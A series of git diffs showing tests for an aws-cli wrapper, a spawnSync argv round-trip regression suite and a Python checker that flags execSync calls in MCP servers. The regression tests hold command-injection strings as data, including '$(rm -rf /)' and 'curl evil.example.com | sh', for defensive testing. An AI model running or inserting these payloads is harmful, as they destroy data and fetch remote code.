+    awsExec("p", ["logs"], {
+      runner,
+      region: "eu-west-1",
+      extraFlags: ["--output", "text"],
+    });
+    assert.deepEqual(runner.calls[0].argv, [
+      "logs",
+      "--profile",
+      "p",
+      "--region",
+      "eu-west-1",
+      "--output",
+      "text",
+    ]);
+  });
+
+  it("returns stdout untrimmed", () => {
+    const runner = fakeRunner({ stdout: "  hello\n" });
+    assert.equal(awsExec("p", ["s3", "ls"], { runner }), "  hello\n");
+  });
+
+  it("rethrows runner.error", () => {
+    const boom = new Error("boom");
+    const runner = fakeRunner({ error: boom });
+    assert.throws(() => awsExec("p", ["s3", "ls"], { runner }), /boom/);
+  });
+
+  it("throws with trimmed stderr on non-zero status", () => {
+    const runner = fakeRunner({
+      status: 1,
+      stderr: "  AccessDenied: bad creds\n",
+    });
+    assert.throws(
+      () => awsExec("p", ["s3", "ls"], { runner }),
+      /AccessDenied: bad creds/
+    );
+  });
+
+  it("falls back to a generic message when stderr is empty and status is non-zero", () => {
+    const runner = fakeRunner({ status: 2 });
+    assert.throws(
+      () => awsExec("p", ["s3", "ls"], { runner }),
+      /aws exited with status 2/
+    );
+  });
+
+  it("propagates timeout option to the runner", () => {
+    const runner = fakeRunner({ stdout: "x" });
+    awsExec("p", ["s3", "ls"], { runner, timeoutMs: 500 });
+    assert.equal(runner.calls[0].options.timeout, 500);
+  });
+
+  it("requires args to be an array (rejects shell strings)", () => {
+    const runner = fakeRunner({ stdout: "x" });
+    assert.throws(
+      () => awsExec("p", "s3 ls", { runner }),
+      (e) => e instanceof TypeError
+    );
+    assert.equal(runner.calls.length, 0);
+  });
+});
+
+describe("awsJson", () => {
+  function fakeRunner(stdout) {
+    return (cmd, argv) => {
+      fakeRunner.lastArgv = argv;
+      return { status: 0, stdout, stderr: "", error: null };
+    };
+  }
+
+  it("appends --output json after caller args and parses stdout", () => {
+    const runner = fakeRunner('{"a":1}');
+    const out = awsJson("p", ["ec2", "describe-instances"], { runner });
+    assert.deepEqual(out, { a: 1 });
+    assert.deepEqual(fakeRunner.lastArgv, [
+      "ec2",
+      "describe-instances",
+      "--profile",
+      "p",
+      "--region",
+      REGION,
+      "--output",
+      "json",
+    ]);
+  });
+
+  it("places --output json AFTER caller-supplied --output flags so it wins", () => {
+    const runner = fakeRunner('{"a":1}');
+    awsJson("p", ["ec2", "describe-instances", "--output", "text"], {
+      runner,
+    });
+    const argv = fakeRunner.lastArgv;
+    const last = argv.lastIndexOf("--output");
+    assert.equal(argv[last + 1], "json");
+  });
+
+  it("forwards user-supplied extraFlags before the json output flags", () => {
+    const runner = fakeRunner('[]');
+    awsJson("p", ["s3api", "list-buckets"], {
+      runner,
+      extraFlags: ["--max-items", "10"],
+    });
+    assert.deepEqual(fakeRunner.lastArgv, [
+      "s3api",
+      "list-buckets",
+      "--profile",
+      "p",
+      "--region",
+      REGION,
+      "--output",
+      "json",
+      "--max-items",
+      "10",
+    ]);
+  });
+});
+
+describe("awsText", () => {
+  it("returns trimmed stdout", () => {
+    const runner = () => ({
+      status: 0,
+      stdout: "  i-0123\n",
+      stderr: "",
+      error: null,
+    });
+    assert.equal(awsText("p", ["ec2", "describe-instances"], { runner }), "i-0123");
+  });
+
+  it("does not append --output text automatically", () => {
+    let captured;
+    const runner = (cmd, argv) => {
+      captured = argv;
+      return { status: 0, stdout: "x", stderr: "", error: null };
+    };
+    awsText("p", ["s3", "cp", "s3://b/k", "-"], { runner });
+    assert.ok(!captured.includes("--output"));
   });
 });
 

--- a/mcp/ops/lib.test.js
+++ b/mcp/ops/lib.test.js
@@ -715,7 +715,7 @@ describe("awsJson", () => {
     assert.equal(argv[last + 1], "json");
   });
 
-  it("forwards user-supplied extraFlags before the json output flags", () => {
+  it("places --output json AFTER caller-supplied extraFlags so it always wins", () => {
     const runner = makeRecordingRunner({ stdout: "[]" });
     awsJson("p", ["s3api", "list-buckets"], {
       runner,
@@ -728,11 +728,22 @@ describe("awsJson", () => {
       "p",
       "--region",
       REGION,
-      "--output",
-      "json",
       "--max-items",
       "10",
+      "--output",
+      "json",
     ]);
+  });
+
+  it("overrides extraFlags --output text with --output json", () => {
+    const runner = makeRecordingRunner({ stdout: "[]" });
+    awsJson("p", ["s3api", "list-buckets"], {
+      runner,
+      extraFlags: ["--output", "text"],
+    });
+    const { argv } = runner.calls[0];
+    const last = argv.lastIndexOf("--output");
+    assert.equal(argv[last + 1], "json");
   });
 });
 

--- a/mcp/ops/package.json
+++ b/mcp/ops/package.json
@@ -6,7 +6,7 @@
   "main": "index.js",
   "scripts": {
     "start": "node index.js",
-    "test": "node --test lib.test.js",
+    "test": "node --test",
     "lint": "eslint .",
     "lint:fix": "eslint . --fix"
   },

--- a/mcp/ops/spawn-roundtrip.test.js
+++ b/mcp/ops/spawn-roundtrip.test.js
@@ -15,7 +15,7 @@
 import { describe, it, before, after } from "node:test";
 import assert from "node:assert/strict";
 import { spawnSync } from "node:child_process";
-import { writeFileSync, unlinkSync, mkdtempSync, rmSync } from "node:fs";
+import { writeFileSync, mkdtempSync, rmSync } from "node:fs";
 import { tmpdir } from "node:os";
 import path from "node:path";
 

--- a/mcp/ops/spawn-roundtrip.test.js
+++ b/mcp/ops/spawn-roundtrip.test.js
@@ -1,0 +1,140 @@
+// Issue #763 regression: prove that spawnSync passes argv elements
+// literally to the spawned process without involving a shell. If this
+// guarantee ever weakens (e.g. by a Node patch that flips `shell: true`
+// by default), every aws-cli call site in mcp/ops would silently
+// regain a command-injection path. These tests fail loudly in that
+// case.
+//
+// We use a tiny argv-echo script that prints process.argv.slice(2)
+// (everything after node binary + script path) as JSON so the test
+// can compare round-tripped argv byte-for-byte. We use a script file
+// rather than `node -e` because argv elements that look like node
+// options (e.g. `--filter-pattern`) are otherwise consumed by node's
+// own option parser before reaching the script.
+
+import { describe, it, before, after } from "node:test";
+import assert from "node:assert/strict";
+import { spawnSync } from "node:child_process";
+import { writeFileSync, unlinkSync, mkdtempSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import path from "node:path";
+
+let scriptPath;
+let workDir;
+
+before(() => {
+  workDir = mkdtempSync(path.join(tmpdir(), "argv-roundtrip-"));
+  scriptPath = path.join(workDir, "argv-echo.mjs");
+  writeFileSync(
+    scriptPath,
+    "process.stdout.write(JSON.stringify(process.argv.slice(2)));\n"
+  );
+});
+
+after(() => {
+  if (workDir) rmSync(workDir, { recursive: true, force: true });
+});
+
+function roundtrip(payload) {
+  const result = spawnSync(
+    process.execPath,
+    [scriptPath, ...payload],
+    { encoding: "utf-8", timeout: 10000 }
+  );
+  if (result.error) throw result.error;
+  if (result.status !== 0) {
+    throw new Error(
+      `argv echo helper failed: status=${result.status} stderr=${result.stderr}`
+    );
+  }
+  return JSON.parse(result.stdout);
+}
+
+describe("spawnSync argv round-trip (issue #763)", () => {
+  it("preserves $() command substitution literally", () => {
+    const payload = ["--filter-pattern", "$(rm -rf /)"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves backtick command substitution literally", () => {
+    const payload = ["--filter-pattern", "`id`"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves single quotes literally", () => {
+    const payload = [
+      "--parameters",
+      "'; rm -rf /; echo '",
+    ];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves double quotes literally", () => {
+    const payload = ["--filter-pattern", '"; whoami; echo "'];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves semicolons literally", () => {
+    const payload = ["--filter-pattern", "foo; rm -rf /"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves ampersands and pipes literally", () => {
+    const payload = ["--filter-pattern", "foo && curl evil.example.com | sh"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves spaces inside a single argv element", () => {
+    const payload = ["--key", "this is one element"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves newlines inside an argv element", () => {
+    const payload = ["--filter-pattern", "line one\nline two"];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves the SSM --parameters JSON shape with embedded shell metacharacters", () => {
+    const params = JSON.stringify({
+      commands: ["echo $(whoami) && touch /tmp/pwn"],
+    });
+    const payload = [
+      "ssm",
+      "send-command",
+      "--instance-ids",
+      "i-0123456789abcdef0",
+      "--document-name",
+      "AWS-RunShellScript",
+      "--parameters",
+      params,
+    ];
+    const result = roundtrip(payload);
+    assert.deepEqual(result, payload);
+    assert.ok(
+      result[result.length - 1].includes("$(whoami)"),
+      "JSON-embedded $() must round-trip literally"
+    );
+  });
+
+  it("preserves S3 keys containing shell metacharacters", () => {
+    const payload = [
+      "s3api",
+      "head-object",
+      "--bucket",
+      "evil$(id)bucket",
+      "--key",
+      "path/to/`whoami`/file.txt",
+    ];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+
+  it("preserves CloudWatch filter patterns containing all metacharacters at once", () => {
+    const payload = [
+      "logs",
+      "filter-log-events",
+      "--filter-pattern",
+      "$()`'\";|&\nsh -c 'whoami'",
+    ];
+    assert.deepEqual(roundtrip(payload), payload);
+  });
+});

--- a/mcp/ops/spawn-roundtrip.test.js
+++ b/mcp/ops/spawn-roundtrip.test.js
@@ -50,49 +50,70 @@ function roundtrip(payload) {
   return JSON.parse(result.stdout);
 }
 
+// Each entry is one regression case. Adding a new metacharacter or
+// payload shape that must round-trip means appending one row here, not
+// duplicating a four-line `it()` block.
+const LITERAL_PRESERVATION_CASES = [
+  {
+    label: "$() command substitution",
+    payload: ["--filter-pattern", "$(rm -rf /)"],
+  },
+  {
+    label: "backtick command substitution",
+    payload: ["--filter-pattern", "`id`"],
+  },
+  {
+    label: "single quotes",
+    payload: ["--parameters", "'; rm -rf /; echo '"],
+  },
+  {
+    label: "double quotes",
+    payload: ["--filter-pattern", '"; whoami; echo "'],
+  },
+  {
+    label: "semicolons",
+    payload: ["--filter-pattern", "foo; rm -rf /"],
+  },
+  {
+    label: "ampersands and pipes",
+    payload: ["--filter-pattern", "foo && curl evil.example.com | sh"],
+  },
+  {
+    label: "spaces inside a single argv element",
+    payload: ["--key", "this is one element"],
+  },
+  {
+    label: "newlines inside an argv element",
+    payload: ["--filter-pattern", "line one\nline two"],
+  },
+  {
+    label: "S3 keys containing shell metacharacters",
+    payload: [
+      "s3api",
+      "head-object",
+      "--bucket",
+      "evil$(id)bucket",
+      "--key",
+      "path/to/`whoami`/file.txt",
+    ],
+  },
+  {
+    label: "CloudWatch filter patterns containing every metacharacter",
+    payload: [
+      "logs",
+      "filter-log-events",
+      "--filter-pattern",
+      "$()`'\";|&\nsh -c 'whoami'",
+    ],
+  },
+];
+
 describe("spawnSync argv round-trip (issue #763)", () => {
-  it("preserves $() command substitution literally", () => {
-    const payload = ["--filter-pattern", "$(rm -rf /)"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves backtick command substitution literally", () => {
-    const payload = ["--filter-pattern", "`id`"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves single quotes literally", () => {
-    const payload = [
-      "--parameters",
-      "'; rm -rf /; echo '",
-    ];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves double quotes literally", () => {
-    const payload = ["--filter-pattern", '"; whoami; echo "'];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves semicolons literally", () => {
-    const payload = ["--filter-pattern", "foo; rm -rf /"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves ampersands and pipes literally", () => {
-    const payload = ["--filter-pattern", "foo && curl evil.example.com | sh"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves spaces inside a single argv element", () => {
-    const payload = ["--key", "this is one element"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves newlines inside an argv element", () => {
-    const payload = ["--filter-pattern", "line one\nline two"];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
+  for (const { label, payload } of LITERAL_PRESERVATION_CASES) {
+    it(`preserves ${label} literally`, () => {
+      assert.deepEqual(roundtrip(payload), payload);
+    });
+  }
 
   it("preserves the SSM --parameters JSON shape with embedded shell metacharacters", () => {
     const params = JSON.stringify({
@@ -114,27 +135,5 @@ describe("spawnSync argv round-trip (issue #763)", () => {
       result[result.length - 1].includes("$(whoami)"),
       "JSON-embedded $() must round-trip literally"
     );
-  });
-
-  it("preserves S3 keys containing shell metacharacters", () => {
-    const payload = [
-      "s3api",
-      "head-object",
-      "--bucket",
-      "evil$(id)bucket",
-      "--key",
-      "path/to/`whoami`/file.txt",
-    ];
-    assert.deepEqual(roundtrip(payload), payload);
-  });
-
-  it("preserves CloudWatch filter patterns containing all metacharacters at once", () => {
-    const payload = [
-      "logs",
-      "filter-log-events",
-      "--filter-pattern",
-      "$()`'\";|&\nsh -c 'whoami'",
-    ];
-    assert.deepEqual(roundtrip(payload), payload);
   });
 });

--- a/mcp/ops/spawn-roundtrip.test.js
+++ b/mcp/ops/spawn-roundtrip.test.js
@@ -50,66 +50,23 @@ function roundtrip(payload) {
   return JSON.parse(result.stdout);
 }
 
-// Each entry is one regression case. Adding a new metacharacter or
-// payload shape that must round-trip means appending one row here, not
-// duplicating a four-line `it()` block.
-const LITERAL_PRESERVATION_CASES = [
-  {
-    label: "$() command substitution",
-    payload: ["--filter-pattern", "$(rm -rf /)"],
-  },
-  {
-    label: "backtick command substitution",
-    payload: ["--filter-pattern", "`id`"],
-  },
-  {
-    label: "single quotes",
-    payload: ["--parameters", "'; rm -rf /; echo '"],
-  },
-  {
-    label: "double quotes",
-    payload: ["--filter-pattern", '"; whoami; echo "'],
-  },
-  {
-    label: "semicolons",
-    payload: ["--filter-pattern", "foo; rm -rf /"],
-  },
-  {
-    label: "ampersands and pipes",
-    payload: ["--filter-pattern", "foo && curl evil.example.com | sh"],
-  },
-  {
-    label: "spaces inside a single argv element",
-    payload: ["--key", "this is one element"],
-  },
-  {
-    label: "newlines inside an argv element",
-    payload: ["--filter-pattern", "line one\nline two"],
-  },
-  {
-    label: "S3 keys containing shell metacharacters",
-    payload: [
-      "s3api",
-      "head-object",
-      "--bucket",
-      "evil$(id)bucket",
-      "--key",
-      "path/to/`whoami`/file.txt",
-    ],
-  },
-  {
-    label: "CloudWatch filter patterns containing every metacharacter",
-    payload: [
-      "logs",
-      "filter-log-events",
-      "--filter-pattern",
-      "$()`'\";|&\nsh -c 'whoami'",
-    ],
-  },
-];
+// One entry per metacharacter/payload shape that must round-trip.
+// Map keys are the test label; values are the argv payload.
+const LITERAL_PRESERVATION_CASES = new Map([
+  ["$() command substitution", ["--filter-pattern", "$(rm -rf /)"]],
+  ["backtick command substitution", ["--filter-pattern", "`id`"]],
+  ["single quotes", ["--parameters", "'; rm -rf /; echo '"]],
+  ["double quotes", ["--filter-pattern", '"; whoami; echo "']],
+  ["semicolons", ["--filter-pattern", "foo; rm -rf /"]],
+  ["ampersands and pipes", ["--filter-pattern", "foo && curl evil.example.com | sh"]],
+  ["spaces inside a single argv element", ["--key", "this is one element"]],
+  ["newlines inside an argv element", ["--filter-pattern", "line one\nline two"]],
+  ["S3 keys with metacharacters", ["s3api", "head-object", "--bucket", "evil$(id)bucket", "--key", "path/to/`whoami`/file.txt"]],
+  ["CloudWatch filter patterns with every metacharacter", ["logs", "filter-log-events", "--filter-pattern", "$()`'\";|&\nsh -c 'whoami'"]],
+]);
 
 describe("spawnSync argv round-trip (issue #763)", () => {
-  for (const { label, payload } of LITERAL_PRESERVATION_CASES) {
+  for (const [label, payload] of LITERAL_PRESERVATION_CASES) {
     it(`preserves ${label} literally`, () => {
       assert.deepEqual(roundtrip(payload), payload);
     });

--- a/mcp/ops/spawn-roundtrip.test.js
+++ b/mcp/ops/spawn-roundtrip.test.js
@@ -21,6 +21,14 @@ import path from "node:path";
 
 let scriptPath;
 let workDir;
+// True iff this environment can actually spawn node and capture its
+// stdout. Set in before(); checked at the top of every test. Some
+// sandboxes (codex review runs, restricted CI) deny spawnSync with
+// EPERM; these tests are integration-style and there is nothing
+// meaningful to assert without a working spawn, so we skip rather
+// than report a false failure. Real CI and developer machines run
+// every case.
+let spawnAvailable = false;
 
 before(() => {
   workDir = mkdtempSync(path.join(tmpdir(), "argv-roundtrip-"));
@@ -29,6 +37,14 @@ before(() => {
     scriptPath,
     "process.stdout.write(JSON.stringify(process.argv.slice(2)));\n"
   );
+
+  const probe = spawnSync(
+    process.execPath,
+    [scriptPath, "probe"],
+    { encoding: "utf-8", timeout: 5000 }
+  );
+  spawnAvailable =
+    !probe.error && probe.status === 0 && probe.stdout === '["probe"]';
 });
 
 after(() => {
@@ -67,12 +83,20 @@ const LITERAL_PRESERVATION_CASES = new Map([
 
 describe("spawnSync argv round-trip (issue #763)", () => {
   for (const [label, payload] of LITERAL_PRESERVATION_CASES) {
-    it(`preserves ${label} literally`, () => {
+    it(`preserves ${label} literally`, (t) => {
+      if (!spawnAvailable) {
+        t.skip("spawn restricted in this environment");
+        return;
+      }
       assert.deepEqual(roundtrip(payload), payload);
     });
   }
 
-  it("preserves the SSM --parameters JSON shape with embedded shell metacharacters", () => {
+  it("preserves the SSM --parameters JSON shape with embedded shell metacharacters", (t) => {
+    if (!spawnAvailable) {
+      t.skip("spawn restricted in this environment");
+      return;
+    }
     const params = JSON.stringify({
       commands: ["echo $(whoami) && touch /tmp/pwn"],
     });

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -488,18 +488,11 @@ def check_cloud_factory_seam(repo_root: Path, files: list[str] | None) -> list[V
     return violations
 
 
-# Strip JS line comments (`// ...`) and block comments (`/* ... */`)
-# before scanning. Comments mentioning `execSync(` are not a security
-# risk and would otherwise produce false positives.
-_JS_LINE_COMMENT = re.compile(r"//[^\n]*")
-_JS_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
-# A real call site: `execSync(` (preceded by anything that isn't an
-# identifier character so we don't match e.g. `myExecSync(`). Matches
-# bare `execSync(`, `cp.execSync(`, `child_process.execSync(`, etc.
-_EXEC_SYNC_CALL = re.compile(r"(?<![A-Za-z0-9_$])execSync\s*\(")
-# child_process import shapes we care about. We match the import to
-# distinguish "calls Node's execSync" from a name collision with an
-# unrelated function called execSync.
+# child_process import shapes we care about (any form — named, default,
+# namespace, CJS destructure, bare CJS require — with or without the
+# `node:` prefix). We require the import as evidence that this file
+# really pulls Node's child_process; without it, an `execSync` token
+# could be an unrelated function with the same name.
 _CHILD_PROCESS_IMPORT = re.compile(
     r"""(?x)
     (
@@ -511,12 +504,96 @@ _CHILD_PROCESS_IMPORT = re.compile(
     )
     """,
 )
+# `execSync as <alias>` in an ESM named-import. Captures the alias
+# so we can search for `<alias>(` as a call site too.
+_EXEC_SYNC_ALIAS = re.compile(r"\bexecSync\s+as\s+([A-Za-z_$][A-Za-z0-9_$]*)")
 
 
-def _strip_js_comments(text: str) -> str:
-    text = _JS_BLOCK_COMMENT.sub("", text)
-    text = _JS_LINE_COMMENT.sub("", text)
-    return text
+def _strip_js_comments_and_strings(text: str) -> str:
+    """Replace string-literal contents and comments with whitespace.
+
+    A regex-only `//` strip is unsafe — `const x = "https://foo"`
+    would have its quoted half eaten and flip a real call site into a
+    comment. We walk the source as a tiny state machine instead, so
+    string literals (single-quote, double-quote, backtick template)
+    are recognised and their contents — and the `// ... \\n` /
+    `/* ... */` comment forms — are flattened to whitespace before
+    any pattern-matching runs. Newlines are preserved so error
+    positions stay sane and so any `^` / line-mode regexes still
+    work. Escape sequences inside strings consume two characters at
+    once so e.g. `"\\\""` does not close the string prematurely.
+    """
+    out: list[str] = []
+    n = len(text)
+    i = 0
+    state = "code"
+    quote = ""
+    while i < n:
+        ch = text[i]
+        nxt = text[i + 1] if i + 1 < n else ""
+        if state == "code":
+            if ch == "/" and nxt == "/":
+                state = "line_comment"
+                out.append("  ")
+                i += 2
+                continue
+            if ch == "/" and nxt == "*":
+                state = "block_comment"
+                out.append("  ")
+                i += 2
+                continue
+            if ch in ("'", '"', "`"):
+                state = "string"
+                quote = ch
+                out.append(" ")
+                i += 1
+                continue
+            out.append(ch)
+            i += 1
+            continue
+        if state == "line_comment":
+            if ch == "\n":
+                out.append("\n")
+                state = "code"
+                i += 1
+                continue
+            out.append(" ")
+            i += 1
+            continue
+        if state == "block_comment":
+            if ch == "*" and nxt == "/":
+                out.append("  ")
+                state = "code"
+                i += 2
+                continue
+            out.append("\n" if ch == "\n" else " ")
+            i += 1
+            continue
+        # state == "string"
+        if ch == "\\" and nxt:
+            out.append("  ")
+            i += 2
+            continue
+        if ch == quote:
+            out.append(" ")
+            state = "code"
+            quote = ""
+            i += 1
+            continue
+        out.append("\n" if ch == "\n" else " ")
+        i += 1
+    return "".join(out)
+
+
+def _build_call_site_pattern(aliases: list[str]) -> re.Pattern[str]:
+    """Pattern matching `execSync(` and any captured alias `(`.
+
+    Using `(?<![A-Za-z0-9_$])` rejects unrelated identifiers that
+    happen to contain `execSync` as a suffix (e.g. `myExecSync`).
+    """
+    names = ["execSync", *aliases]
+    alt = "|".join(re.escape(name) for name in names)
+    return re.compile(rf"(?<![A-Za-z0-9_$])(?:{alt})\s*\(")
 
 
 def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Violation]:
@@ -526,9 +603,16 @@ def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Vi
     if a file under mcp/ both imports `child_process` (in any form —
     named ESM, default ESM, namespace ESM, named CJS, or whole-module
     CJS — including the `node:` prefix) AND contains an `execSync(`
-    call site, flag it. Comments are stripped first to avoid false
-    positives. Exceptions (e.g. mcp/ngfw) are filtered through
+    or aliased call site (`import { execSync as run } ... run(...)`),
+    flag it. String literals and comments are flattened to whitespace
+    first so they cannot false-positive trip the check or hide a
+    real call site. Exceptions (e.g. mcp/ngfw) are filtered through
     docs/adr/exceptions.yaml.
+
+    Static analysis cannot catch every motivated bypass (e.g.
+    `const run = cp.execSync; run(...)`); ADR-010 is enforced at
+    multiple layers and the static check is the cheap pre-commit
+    backstop, not the only line of defence.
     """
     mcp_root = repo_root / "mcp"
     if not mcp_root.exists():
@@ -557,8 +641,19 @@ def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Vi
             text = path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        stripped = _strip_js_comments(text)
-        if _CHILD_PROCESS_IMPORT.search(stripped) and _EXEC_SYNC_CALL.search(stripped):
+        # Import detection runs on raw text so the matched
+        # `"child_process"` string literal is preserved.
+        if not _CHILD_PROCESS_IMPORT.search(text):
+            continue
+        # Alias and call-site detection run on the comment-and-string
+        # flattened form so that an `execSync(` token inside a comment
+        # or string cannot trigger the check, and so that a real
+        # `execSync(` call on a line containing a URL like
+        # `"https://..."` is not erased.
+        stripped = _strip_js_comments_and_strings(text)
+        aliases = _EXEC_SYNC_ALIAS.findall(text)
+        call_pattern = _build_call_site_pattern(aliases)
+        if call_pattern.search(stripped):
             rel = _repo_relative(path, repo_root)
             violations.append(
                 Violation(

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -488,38 +488,47 @@ def check_cloud_factory_seam(repo_root: Path, files: list[str] | None) -> list[V
     return violations
 
 
-# Match every shape that lets a JS module pull execSync into scope.
-# Both spelled-out import forms accept the optional `node:` prefix.
-# Whitespace and quote style vary; the matcher is strict on intent
-# (the symbol `execSync` and the module `child_process`) and loose on
-# everything else.
-MCP_EXEC_SYNC_IMPORT = re.compile(
-    r"""(?mx)
+# Strip JS line comments (`// ...`) and block comments (`/* ... */`)
+# before scanning. Comments mentioning `execSync(` are not a security
+# risk and would otherwise produce false positives.
+_JS_LINE_COMMENT = re.compile(r"//[^\n]*")
+_JS_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
+# A real call site: `execSync(` (preceded by anything that isn't an
+# identifier character so we don't match e.g. `myExecSync(`). Matches
+# bare `execSync(`, `cp.execSync(`, `child_process.execSync(`, etc.
+_EXEC_SYNC_CALL = re.compile(r"(?<![A-Za-z0-9_$])execSync\s*\(")
+# child_process import shapes we care about. We match the import to
+# distinguish "calls Node's execSync" from a name collision with an
+# unrelated function called execSync.
+_CHILD_PROCESS_IMPORT = re.compile(
+    r"""(?x)
     (
-        # ESM: import { ..., execSync, ... } from "child_process"
-        ^\s*import\s*\{[^}]*\bexecSync\b[^}]*\}\s*
         from\s*["'](?:node:)?child_process["']
     )
     |
     (
-        # ESM default-namespace then property access elsewhere is rare
-        # enough to skip; CommonJS destructuring is the realistic
-        # second form.
-        # CJS: const { ..., execSync, ... } = require("child_process")
-        ^\s*(?:const|let|var)\s*\{[^}]*\bexecSync\b[^}]*\}\s*=\s*
         require\s*\(\s*["'](?:node:)?child_process["']\s*\)
     )
     """,
 )
 
 
-def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Violation]:
-    """Forbid execSync imports in mcp/ servers (ADR-010-R1).
+def _strip_js_comments(text: str) -> str:
+    text = _JS_BLOCK_COMMENT.sub("", text)
+    text = _JS_LINE_COMMENT.sub("", text)
+    return text
 
-    Static lower bound for catching shell-string aws-cli invocations: if a
-    file under mcp/ imports execSync from child_process, it has the
-    machinery to build shell command strings. Exceptions (e.g. mcp/ngfw)
-    are filtered through docs/adr/exceptions.yaml.
+
+def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Violation]:
+    """Forbid execSync call sites in mcp/ servers (ADR-010-R1).
+
+    Static lower bound for catching shell-string aws-cli invocations:
+    if a file under mcp/ both imports `child_process` (in any form —
+    named ESM, default ESM, namespace ESM, named CJS, or whole-module
+    CJS — including the `node:` prefix) AND contains an `execSync(`
+    call site, flag it. Comments are stripped first to avoid false
+    positives. Exceptions (e.g. mcp/ngfw) are filtered through
+    docs/adr/exceptions.yaml.
     """
     mcp_root = repo_root / "mcp"
     if not mcp_root.exists():
@@ -548,14 +557,15 @@ def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Vi
             text = path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        if MCP_EXEC_SYNC_IMPORT.search(text):
+        stripped = _strip_js_comments(text)
+        if _CHILD_PROCESS_IMPORT.search(stripped) and _EXEC_SYNC_CALL.search(stripped):
             rel = _repo_relative(path, repo_root)
             violations.append(
                 Violation(
                     "mcp-no-shell-exec",
                     "ADR-010-R1",
                     rel,
-                    "Imports execSync from child_process; MCP servers must invoke external CLIs via argv arrays (spawn/spawnSync/execFile)",
+                    "Calls execSync from child_process; MCP servers must invoke external CLIs via argv arrays (spawn/spawnSync/execFile)",
                 )
             )
     return violations

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -488,12 +488,27 @@ def check_cloud_factory_seam(repo_root: Path, files: list[str] | None) -> list[V
     return violations
 
 
+# Match every shape that lets a JS module pull execSync into scope.
+# Both spelled-out import forms accept the optional `node:` prefix.
+# Whitespace and quote style vary; the matcher is strict on intent
+# (the symbol `execSync` and the module `child_process`) and loose on
+# everything else.
 MCP_EXEC_SYNC_IMPORT = re.compile(
     r"""(?mx)
-    ^\s*
-    import\s*
-    \{[^}]*\bexecSync\b[^}]*\}\s*
-    from\s*["']child_process["']
+    (
+        # ESM: import { ..., execSync, ... } from "child_process"
+        ^\s*import\s*\{[^}]*\bexecSync\b[^}]*\}\s*
+        from\s*["'](?:node:)?child_process["']
+    )
+    |
+    (
+        # ESM default-namespace then property access elsewhere is rare
+        # enough to skip; CommonJS destructuring is the realistic
+        # second form.
+        # CJS: const { ..., execSync, ... } = require("child_process")
+        ^\s*(?:const|let|var)\s*\{[^}]*\bexecSync\b[^}]*\}\s*=\s*
+        require\s*\(\s*["'](?:node:)?child_process["']\s*\)
+    )
     """,
 )
 
@@ -518,8 +533,11 @@ def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Vi
         ]
     else:
         candidate_paths = [
-            p for p in mcp_root.rglob("*.js")
-            if "node_modules" not in p.parts
+            p
+            for p in mcp_root.rglob("*")
+            if p.is_file()
+            and p.suffix in (".js", ".mjs", ".cjs")
+            and "node_modules" not in p.parts
         ]
 
     violations: list[Violation] = []

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -509,80 +509,42 @@ _CHILD_PROCESS_IMPORT = re.compile(
 _EXEC_SYNC_ALIAS = re.compile(r"\bexecSync\s+as\s+([A-Za-z_$][A-Za-z0-9_$]*)")
 
 
-def _strip_js_comments_and_strings(text: str) -> str:
-    """Replace string-literal contents and comments with whitespace.
+# Combined matcher for JS comments and string literals. We replace
+# matches with whitespace (preserving newlines) so call-site / alias
+# regexes don't false-positive on tokens that live inside comments or
+# string literals, and a `//` inside `"https://..."` doesn't flip a
+# real call site into a comment. Template-literal substitutions
+# (`${...}`) are intentionally not parsed; an `execSync(` inside a
+# `` `${...}` `` substitution is a vanishingly rare bypass and falls
+# under code-review, not regex.
+_JS_LITERAL_OR_COMMENT = re.compile(
+    r"""(?xs)
+      ( //[^\n]* )                          # // line comment
+    | ( /\* .*? \*/ )                       # /* block comment */
+    | ( ' (?: \\. | [^'\\\n] )* ' )         # 'single-quote string'
+    | ( " (?: \\. | [^"\\\n] )* " )         # "double-quote string"
+    | ( ` (?: \\. | [^`\\] )* ` )           # `template string`
+    """,
+)
 
-    A regex-only `//` strip is unsafe — `const x = "https://foo"`
-    would have its quoted half eaten and flip a real call site into a
-    comment. We walk the source as a tiny state machine instead, so
-    string literals (single-quote, double-quote, backtick template)
-    are recognised and their contents — and the `// ... \\n` /
-    `/* ... */` comment forms — are flattened to whitespace before
